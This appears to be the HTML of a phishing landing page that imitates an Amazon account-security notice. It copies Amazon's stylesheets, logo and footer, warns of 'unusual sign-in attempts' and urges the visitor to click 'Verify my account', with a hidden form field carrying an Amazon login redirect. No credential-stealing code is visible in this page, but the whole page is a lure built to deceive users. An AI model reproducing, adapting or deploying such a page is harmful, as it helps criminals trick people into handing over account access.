<html class="a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-gradients a-transform3d a-touch-scrolling a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition a-ember" data-19ax5a9jf="dingo" data-aui-build-date="3.21.4-2021-05-28">
<head>
<meta charset="utf-8">
<title dir="ltr">Unusual Activity Detected</title>
<link rel="apple-touch-icon" sizes="76x76" href="../static/img/logo.png'">
<link rel="icon" type="image/x-icon" href="../static/img/favicon.ico'" />
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61A6IErPNXL._RC|11Fd9tJOdtL.css,11tfezETfFL.css,31Q3id-QR0L.css,31U9HrBLKmL.css_.css?AUIClients/AmazonUI#us.not-trident">
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|31jdWD+JB+L.css,41DBI6BbFkL.css_.css?AUIClients/AuthenticationPortalAssets">
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/11qeL1AgUGL.css?AUIClients/CVFAssets">
<div class="a-section a-padding-medium auth-workflow">
    <div class="a-section a-spacing-none auth-navbar">
        <div class="a-section a-spacing-medium a-text-center">
            <a class="a-link-nav-icon" tabindex="-1"><i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i></a>
        </div>
    </div>
    <div id="authportal-center-section" class="a-section">
        <div id="authportal-main-section" class="a-section"><br /><br />
            <div class="a-section auth-pagelet-container">
                <div class="a-section a-spacing-double-large">
                    <div class="a-box a-spacing-base">
                        <div class="a-box-inner a-padding-extra-large">
                            <form method="post" action="#" class="a-spacing-none">
                                <input
                                    type="hidden"
                                    name="akseskey"
                                    value="ap?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fs%3Fk%3Damazon%2Blogin%26adgrpid%3D79685717977%26gclid%3DEAIaIQobChMIqvyY9rjs_AIVDFpgCh3iDwLSEAAYASAAEgLkG_D_BwE%26hvadid%3D585359104713%26hvdev%3Dc%26hvlocphy%3D9119934%26hvnetw%3Dg%26hvqmt%3De%26hvrand%3D13950319226766353353%26hvtargid%3Dkwd-360364907677%26hydadcr%3D2745_13541852%26tag%3Dhydglogoo-20%26ref%3Dnav_custrec_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" />
                                <h2 class="a-text-normal">Unusual Activity Detected
                                </h2>
                                <p class="a-spacing-none">We detected unusual sign-in attempts. To ensure that no one else tries to access your account, please secure and verify your account!
                                </p>
                                <div class="a-section a-spacing-top-extra-large">
                                    <span class="a-button a-button-span12 a-button-primary" id="a-autoid-0">
                                        <span class="a-button-inner">
                                            <input id="continue" tabindex="3" class="a-button-input" type="submit" aria-labelledby="a-autoid-0-announce">
                                            <span class="a-button-text" aria-hidden="true" id="a-autoid-0-announce">Verify my account</span>
                                        </span>
                                    </span>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="right-2"></div><br /><br /><br /><br /><br /><br /><br /><br />
    <div class="a-section a-spacing-top-extra-large auth-footer">
        <div class="a-divider a-divider-section">
            <div class="a-divider-inner"></div>
        </div>
        <div class="a-section a-spacing-small a-text-center a-size-mini">
            <span class="auth-footer-seperator"></span>
            <a class="a-link-normal" target="_blank" rel="noopener">Conditions of Use</a>
            <span class="auth-footer-seperator"></span>
            <a class="a-link-normal" target="_blank" rel="noopener">Privacy Notice</a>
            <span class="auth-footer-seperator"></span>
            <a class="a-link-normal" target="_blank" rel="noopener">Help</a>
            <span class="auth-footer-seperator"></span>
        </div>
        <div class="a-section a-spacing-none a-text-center">
            <span class="a-size-mini a-color-secondary">© 1996-2023, Amazon.com, Inc. or its affiliates</span>
        </div>
    </div>
</div>
<div id="auth-external-javascript" class="auth-external-javascript" data-external-javascripts=""></div>
</div>
</body>
</html>